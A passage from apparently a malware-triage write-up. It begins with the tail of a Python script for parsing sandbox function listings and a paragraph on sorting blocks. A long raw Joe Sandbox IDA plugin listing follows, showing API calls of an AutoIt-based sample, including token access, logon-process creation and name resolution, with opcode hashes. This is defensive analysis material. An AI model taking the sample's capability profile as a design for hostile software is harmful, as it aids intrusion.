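# Excerpt of the report's own listing (three blocks, verbatim lines).
SAMPLE = """\
APIs
• GetForegroundWindow.USER32 ref: 00BD4F02
  • Part of subcall function 00BB3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00BB365B
  • Part of subcall function 00BB3641: AttachThreadInput.USER32(00000000,?,00BB5005), ref: 00BB3669
• GetCaretPos.USER32(?), ref: 00BD4F13
• ClientToScreen.USER32(00000000,?), ref: 00BD4F4E
Similarity
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00BA85E2
• OpenProcessToken.ADVAPI32(00000000), ref: 00BA85E9
• CloseHandle.KERNEL32(00000004), ref: 00BA8603
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00BA8632
Similarity
• API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
APIs
• gethostbyname.WS2_32(?), ref: 00BC6399
• WSAGetLastError.WS2_32(00000000), ref: 00BC63A4
• _memmove.LIBCMT ref: 00BC63D1
• inet_ntoa.WS2_32(?), ref: 00BC63DC
"""

if __name__ == "__main__":
    parsed = parse_blocks(SAMPLE)
    for b in parsed:
        print(b.calls[0].ref, sorted(b.names()), tag_block(b))
    print(module_histogram(parsed))
```

Feeding the whole function listing of a report through `parse_blocks` and sorting by `tag_block` output is a fast way to find the handful of blocks worth opening in the disassembler (the token and logon block, the WinINet block, the name-resolution block) among the hundreds of CRT and AutoIt housekeeping functions; `module_histogram` shows at a glance whether a dump reaches into `WININET`, `WS2_32` or `ADVAPI32` at all.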
                                              APIs
                                                • Part of subcall function 00B55A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00BB7896,?,?,00000000), ref: 00B55A2C
                                                • Part of subcall function 00B55A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00BB7896,?,?,00000000,?,?), ref: 00B55A50
                                              • gethostbyname.WS2_32(?), ref: 00BC6399
                                              • WSAGetLastError.WS2_32(00000000), ref: 00BC63A4
                                              • _memmove.LIBCMT ref: 00BC63D1
                                              • inet_ntoa.WS2_32(?), ref: 00BC63DC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                              • String ID:
                                              • API String ID: 1504782959-0
                                              • Opcode ID: 8de27c33b297f3e504bbf63a6f894cb87ecabdc1d4d2be1a665034a7800233b5
                                              • Instruction ID: 911e22a4bd592f9e4c35cff9dc8a0ef09b3264ec5c433e9906e25b92a9602068
                                              • Opcode Fuzzy Hash: 8de27c33b297f3e504bbf63a6f894cb87ecabdc1d4d2be1a665034a7800233b5
                                              • Instruction Fuzzy Hash: 7B112171904109EFCB04FBA4DD96EAEB7F8AF04311B1441E9F906A7261EF319E18DB61
                                              APIs
                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00BA8B61
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00BA8B73
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00BA8B89
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00BA8BA4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: fea92ee234b7880881fa19a8d47ee16deb1074d1352682b6e03bef8d653fd212
                                              • Instruction ID: 8ca97d6eaef61a8f83bbf630862339404cb4a96d21e3f517b596e377c169aadd
                                              • Opcode Fuzzy Hash: fea92ee234b7880881fa19a8d47ee16deb1074d1352682b6e03bef8d653fd212
                                              • Instruction Fuzzy Hash: DB113A79901218BFDB10DB95C884EADBBB4EB48310F204095E900B7290DA716E10DBA4
                                              APIs
                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00BAFCED,?,00BB0D40,?,00008000), ref: 00BB115F
                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00BAFCED,?,00BB0D40,?,00008000), ref: 00BB1184
                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00BAFCED,?,00BB0D40,?,00008000), ref: 00BB118E
                                              • Sleep.KERNEL32(?,?,?,?,?,?,?,00BAFCED,?,00BB0D40,?,00008000), ref: 00BB11C1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CounterPerformanceQuerySleep
                                              • String ID:
                                              • API String ID: 2875609808-0
                                              • Opcode ID: ec3477b2a2052f948105a7bc4b61a8e4ad4e081de9a20dc7a983ebe9b4210742
                                              • Instruction ID: 6fcc191a99c5175a8ad09bb1ac0bafa4106ef16b4cdf1efc6efa9d40c7e5b25d
                                              • Opcode Fuzzy Hash: ec3477b2a2052f948105a7bc4b61a8e4ad4e081de9a20dc7a983ebe9b4210742
                                              • Instruction Fuzzy Hash: 18115A31C0551DE7CF009FA9D898AFEBBB8FF09751F404496EA41B6240DBB09550CBA1
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00BAD84D
                                              • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00BAD864
                                              • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00BAD879
                                              • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00BAD897
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Type$Register$FileLoadModuleNameUser
                                              • String ID:
                                              • API String ID: 1352324309-0
                                              • Opcode ID: e446b4dca297c5f031df9475874f42152a5017f1e4695e3266937342e45c93f3
                                              • Instruction ID: 4cee9ab03568ad9095fab0dac93962cc471de50711340d5854a94266fa1be779
                                              • Opcode Fuzzy Hash: e446b4dca297c5f031df9475874f42152a5017f1e4695e3266937342e45c93f3
                                              • Instruction Fuzzy Hash: 16118E7160A305DBE7208F50EC48FA7BBFCEB01B00F1085AAA517D7990D7B8E5099FA1
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                              • String ID:
                                              • API String ID: 3016257755-0
                                              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                              • Instruction ID: 3418e9e1c4ef3e24c7146e4c22f9312883afc4e8e79c0491643a41ce0d32e664
                                              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                              • Instruction Fuzzy Hash: 2B014E7248814ABBCF176E84CC45CED3FA2FB18359B688495FA1858031DA36C9B1EB81
                                              APIs
                                              • GetWindowRect.USER32(?,?), ref: 00BDB2E4
                                              • ScreenToClient.USER32(?,?), ref: 00BDB2FC
                                              • ScreenToClient.USER32(?,?), ref: 00BDB320
                                              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00BDB33B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ClientRectScreen$InvalidateWindow
                                              • String ID:
                                              • API String ID: 357397906-0
                                              • Opcode ID: 7e15b873f28402051adb76d81d99923945748c3659b729b4f7530323f749fb9b
                                              • Instruction ID: 1c6bd5756cc05913fd16eb27bab3170c3cc61474fdd64abfc55e9453be99b01f
                                              • Opcode Fuzzy Hash: 7e15b873f28402051adb76d81d99923945748c3659b729b4f7530323f749fb9b
                                              • Instruction Fuzzy Hash: CD112375D0420AEFDB41CF99C4449AEFBB5FB08310F108166E915A3620E735AA55DB50
                                              APIs
                                              • _memset.LIBCMT ref: 00BDB644
                                              • _memset.LIBCMT ref: 00BDB653
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00C16F20,00C16F64), ref: 00BDB682
                                              • CloseHandle.KERNEL32 ref: 00BDB694
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: _memset$CloseCreateHandleProcess
                                              • String ID:
                                              • API String ID: 3277943733-0
                                              • Opcode ID: e5739ddd76a4a19f6123e0db27a096e0ad7b31321068da5a53461731925c6b6b
                                              • Instruction ID: 5a626a0c0fee26fb10ac685b5bb05f1673e9f115696f014a545f4be66c1626df
                                              • Opcode Fuzzy Hash: e5739ddd76a4a19f6123e0db27a096e0ad7b31321068da5a53461731925c6b6b
                                              • Instruction Fuzzy Hash: D2F05EF2541300BEE61027A5BC06FFB7A9DEB0A395F008031BA09E6192E7718C02C7A8
                                              APIs
                                              • RtlEnterCriticalSection.NTDLL(?), ref: 00BB6BE6
                                                • Part of subcall function 00BB76C4: _memset.LIBCMT ref: 00BB76F9
                                              • _memmove.LIBCMT ref: 00BB6C09
                                              • _memset.LIBCMT ref: 00BB6C16
                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 00BB6C26
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CriticalSection_memset$EnterLeave_memmove
                                              • String ID:
                                              • API String ID: 48991266-0
                                              • Opcode ID: 9b00dad0e93b82ade1ba19d23feb713cae30a8b1e173f03e691ff34a9d888619
                                              • Instruction ID: b5bd35111403df36aed76332fecf3f316cc8171415854bd8f878a314e6bc4e1d
                                              • Opcode Fuzzy Hash: 9b00dad0e93b82ade1ba19d23feb713cae30a8b1e173f03e691ff34a9d888619
                                              • Instruction Fuzzy Hash: BFF05E3A204100ABCF016F95DC85A9ABB69EF45320F04C0A1FE099F227DB71E911CBB4
                                              APIs
                                              • GetSysColor.USER32(00000008), ref: 00B52231
                                              • SetTextColor.GDI32(?,000000FF), ref: 00B5223B
                                              • SetBkMode.GDI32(?,00000001), ref: 00B52250
                                              • GetStockObject.GDI32(00000005), ref: 00B52258
                                              • GetWindowDC.USER32(?,00000000), ref: 00B8BE83
                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 00B8BE90
                                              • GetPixel.GDI32(00000000,?,00000000), ref: 00B8BEA9
                                              • GetPixel.GDI32(00000000,00000000,?), ref: 00B8BEC2
                                              • GetPixel.GDI32(00000000,?,?), ref: 00B8BEE2
                                              • ReleaseDC.USER32(?,00000000), ref: 00B8BEED
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                              • String ID:
                                              • API String ID: 1946975507-0
                                              • Opcode ID: e26c204da0ddaa659df6d943303abfe45cdfe3ea83c32d6691b16b314793af4c
                                              • Instruction ID: 7da435155b0d254b053f0a4daccae55eb9145244d1f716a18ad64891270bd946
                                              • Opcode Fuzzy Hash: e26c204da0ddaa659df6d943303abfe45cdfe3ea83c32d6691b16b314793af4c
                                              • Instruction Fuzzy Hash: 0DE03932109245AADF215FA4FC0DBE87B50EB15336F0483A7FA6A580F19B728980DB12
                                              APIs
                                              • GetCurrentThread.KERNEL32 ref: 00BA871B
                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,00BA82E6), ref: 00BA8722
                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00BA82E6), ref: 00BA872F
                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,00BA82E6), ref: 00BA8736
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CurrentOpenProcessThreadToken
                                              • String ID:
                                              • API String ID: 3974789173-0
                                              • Opcode ID: d9c06e316a894be712f710db8bdea588c01021c96e492f230b8791f45da3ea69
                                              • Instruction ID: 3b6046166361b8c0491f4ee9ed911b1b930273916512fdb888be166b631da968
                                              • Opcode Fuzzy Hash: d9c06e316a894be712f710db8bdea588c01021c96e492f230b8791f45da3ea69
                                              • Instruction Fuzzy Hash: BAE0863661A2129BD7205FF05D0CB66BBECEF51791F158869B246CB040FE348841C750
                                              APIs
                                              • OleSetContainedObject.OLE32(?,00000001), ref: 00BAB4BE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ContainedObject
                                              • String ID: AutoIt3GUI$Container
                                              • API String ID: 3565006973-3941886329
                                              • Opcode ID: f4597f1626e60dd7c340e8c282b618fb013c57aeec37e6df6e7ac401e8e76751
                                              • Instruction ID: b2dafc0de4b592ba236d81e6bc5c7682f9f7202ed8eb534811dbb1c8f7265abd
                                              • Opcode Fuzzy Hash: f4597f1626e60dd7c340e8c282b618fb013c57aeec37e6df6e7ac401e8e76751
                                              • Instruction Fuzzy Hash: A2915970604601AFDB14DF64C894E6AB7F9FF49700F2485AEE95ACB3A2DB71E841CB50
                                              APIs
                                                • Part of subcall function 00B6FC86: _wcscpy.LIBCMT ref: 00B6FCA9
                                                • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
                                                • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
                                              • __wcsnicmp.LIBCMT ref: 00BBB02D
                                              • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00BBB0F6
                                              Strings
                                              Similarity
                                              • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                              • String ID: LPT
                                              • API String ID: 3222508074-1350329615
                                              • Opcode ID: 6447083e2e4324ceaececfd80d2dd20077d8a724d55827597c9e5d2389a3079b
                                              • Instruction ID: 5ddd50e1576a1d45483681608d5f04f161dec2ca3adae5a4e68338c1adc44c03
                                              • Opcode Fuzzy Hash: 6447083e2e4324ceaececfd80d2dd20077d8a724d55827597c9e5d2389a3079b
                                              • Instruction Fuzzy Hash: 03613C75A10219AFCB14EF98C891EFEB7F4EB09710F1440A9F956AB291D7B0AE44CB50
                                              APIs
                                              • Sleep.KERNEL32(00000000), ref: 00B62968
                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 00B62981
                                              Strings
                                              Similarity
                                              • API ID: GlobalMemorySleepStatus
                                              • String ID: @
                                              • API String ID: 2783356886-2766056989
                                              • Opcode ID: 943f2a2cc9b28e1e9cecdf5deaa5469e528a2c157a67883f8e84dbce0726019e
                                              • Instruction ID: 98bb8d7a6d1f628836663cba2e255096d602cf4398d5f92825640ac3058f915c
                                              • Opcode Fuzzy Hash: 943f2a2cc9b28e1e9cecdf5deaa5469e528a2c157a67883f8e84dbce0726019e
                                              • Instruction Fuzzy Hash: B75137715087449BD320EF10D886BAFBBE8FB85345F41889DF6D8520A1DF71852DCB66
                                              APIs
                                                • Part of subcall function 00B54F0B: __fread_nolock.LIBCMT ref: 00B54F29
                                              • _wcscmp.LIBCMT ref: 00BB9824
                                              • _wcscmp.LIBCMT ref: 00BB9837
                                              Strings
                                              Similarity
                                              • API ID: _wcscmp$__fread_nolock
                                              • String ID: FILE
                                              • API String ID: 4029003684-3121273764
                                              • Opcode ID: 5cf7354c7ed0bc95bd8a7aa3d333347544f90907cda6870c0d07208bcca9dc82
                                              • Instruction ID: 4d8f2a1c969d5c018ec2dc8628d1e22a5d5dd091499e4de9f69331b860eea55a
                                              • Opcode Fuzzy Hash: 5cf7354c7ed0bc95bd8a7aa3d333347544f90907cda6870c0d07208bcca9dc82
                                              • Instruction Fuzzy Hash: A041A771A00209BBDF219AA4CC86FEFBBF9DF85714F0044E9FA05A7181DBB199458B61
                                              APIs
                                              • _memset.LIBCMT ref: 00BC259E
                                              • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00BC25D4
                                              Strings
                                              Similarity
                                              • API ID: CrackInternet_memset
                                              • String ID: |
                                              • API String ID: 1413715105-2343686810
                                              • Opcode ID: 8479df644e3f2bd9fd0d416ebbdf45a6ffaef2e5a0709bb201b9e8b663e4c46a
                                              • Instruction ID: ba7e153ac77f96cd844b93e29dd6b7aa97e422f9740e94972b472a0a68c6d8c1
                                              • Opcode Fuzzy Hash: 8479df644e3f2bd9fd0d416ebbdf45a6ffaef2e5a0709bb201b9e8b663e4c46a
                                              • Instruction Fuzzy Hash: 68310771900119ABCF11EFA4DC85EEEBFB9FF08310F1040A9FD15A6162EA315A56DB60
                                              APIs
                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00BD7B61
                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00BD7B76
                                              Strings
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: '
                                              • API String ID: 3850602802-1997036262
                                              • Opcode ID: fb179769f7145fcb260a652d21938c86bdf875bc1afb45240eac448090361244
                                              • Instruction ID: fcd08ca8be205e14b70a1c108980abb88bd4a4dfe248e958f3563e61abce90b6
                                              • Opcode Fuzzy Hash: fb179769f7145fcb260a652d21938c86bdf875bc1afb45240eac448090361244
                                              • Instruction Fuzzy Hash: C0410874A4520A9FDB14CF64D891BEABBF5FB09304F1041AAE904AB391FB70A951CF90
                                              APIs
                                              • DestroyWindow.USER32(?,?,?,?), ref: 00BD6B17
                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00BD6B53
                                              Strings
                                              Similarity
                                              • API ID: Window$DestroyMove
                                              • String ID: static
                                              • API String ID: 2139405536-2160076837
                                              • Opcode ID: 228adba1ea41778561a42907ba75e8d4c75221d7fd9b3861b8962cf53816bf4f
                                              • Instruction ID: a0cb687115e5efad7e0cac0757cc80d166c39a5dd111deb3d2bae66114882b7a
                                              • Opcode Fuzzy Hash: 228adba1ea41778561a42907ba75e8d4c75221d7fd9b3861b8962cf53816bf4f
                                              • Instruction Fuzzy Hash: A4316E71100604AEDB109F64CC91BFBB7E9FF48760F10856AF9A5D7290EA35AC51C760
                                              APIs
                                              • _memset.LIBCMT ref: 00BB2911
                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00BB294C
                                              Strings
                                              Similarity
                                              • API ID: InfoItemMenu_memset
                                              • String ID: 0
                                              • API String ID: 2223754486-4108050209
                                              • Opcode ID: 3507484d982dbb9153eac9dbea749fdd0555b033cb62916e3a5514fce7ae9474
                                              • Instruction ID: f64b5d9b2f178cf08e294511170e92a3c9342414f440a12902875c83c03271dc
                                              • Opcode Fuzzy Hash: 3507484d982dbb9153eac9dbea749fdd0555b033cb62916e3a5514fce7ae9474
                                              • Instruction Fuzzy Hash: 1931C131A003059BEB24DF58DD85BFEBBF8EF46350F1440B9E9D9A61A0D7B09940CB51
